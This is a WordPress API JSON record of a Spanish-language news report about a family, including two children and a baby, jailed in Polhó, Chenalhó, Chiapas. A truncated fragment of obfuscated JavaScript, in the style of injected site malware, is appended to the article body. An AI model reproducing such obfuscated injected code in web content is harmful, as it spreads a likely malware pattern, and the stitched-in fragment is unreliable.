{"id":21118,"date":"2025-03-28T03:23:43","date_gmt":"2025-03-28T03:23:43","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=21118"},"modified":"2025-03-28T03:23:44","modified_gmt":"2025-03-28T03:23:44","slug":"encarcelan-a-familia-completa-en-polho-chenalho-dos-menores-y-un-bebe-entre-los-detenidos","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=21118","title":{"rendered":"Encarcelan a familia completa en Polh\u00f3, Chenalh\u00f3; dos menores y un beb\u00e9 entre los detenidos"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"636\" height=\"1024\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250327-WA0022-636x1024.jpg\" alt=\"\" class=\"wp-image-21119\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250327-WA0022-636x1024.jpg 636w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250327-WA0022-186x300.jpg 186w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250327-WA0022-768x1237.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250327-WA0022-953x1536.jpg 953w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250327-WA0022.jpg 993w\" sizes=\"auto, (max-width: 636px) 100vw, 636px\" \/><\/figure>\n\n\n\n<p>Yolanda Rodr\u00edguez\/ Corresponsal<\/p>\n\n\n\n<p>27 de marzo del 2025.- Polh\u00f3, Chenalh\u00f3.- Una familia completa, incluidos dos menores de edad y un beb\u00e9 en brazos, fue encarcelada en la comunidad de Polh\u00f3, municipio de Chenalh\u00f3, Chiapas, presuntamente debido a un conflicto comunitario que se resolvi\u00f3 bajo los usos y costumbres de la localidad.<\/p>\n\n\n\n<p>El caso ha generado preocupaci\u00f3n entre defensores de derechos humanos, quienes han hecho un llamado urgente a las autoridades y organismos de protecci\u00f3n infantil para que investiguen la situaci\u00f3n y garanticen la seguridad de los menores.<\/p>\n\n\n\n<p>Hasta el momento, no se han dado a conocer m\u00e1s detalles sobre la raz\u00f3n del encarcelamiento ni sobre las condiciones en las que se encuentran los ni\u00f1os y el beb\u00e9. Se espera que las instancias correspondientes intervengan de manera inmediata para esclarecer los hechos y tomar las medidas necesarias.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Yolanda Rodr\u00edguez\/ Corresponsal 27 de marzo del 2025.- Polh\u00f3, Chenalh\u00f3.- Una familia completa, incluidos dos menores de edad y un beb\u00e9 en brazos, fue encarcelada en la comunidad de Polh\u00f3, municipio de Chenalh\u00f3, Chiapas, presuntamente debido a un conflicto comunitario que se resolvi\u00f3 bajo los usos y costumbres de la localidad. El caso ha generado &hellip;<\/p>\n","protected":false},"author":2,"featured_media":21119,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-21118","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21118","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=21118"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21118\/revisions"}],"predecessor-version":[{"id":21120,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21118\/revisions\/21120"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/21119"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=21118"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=21118"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=21118"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}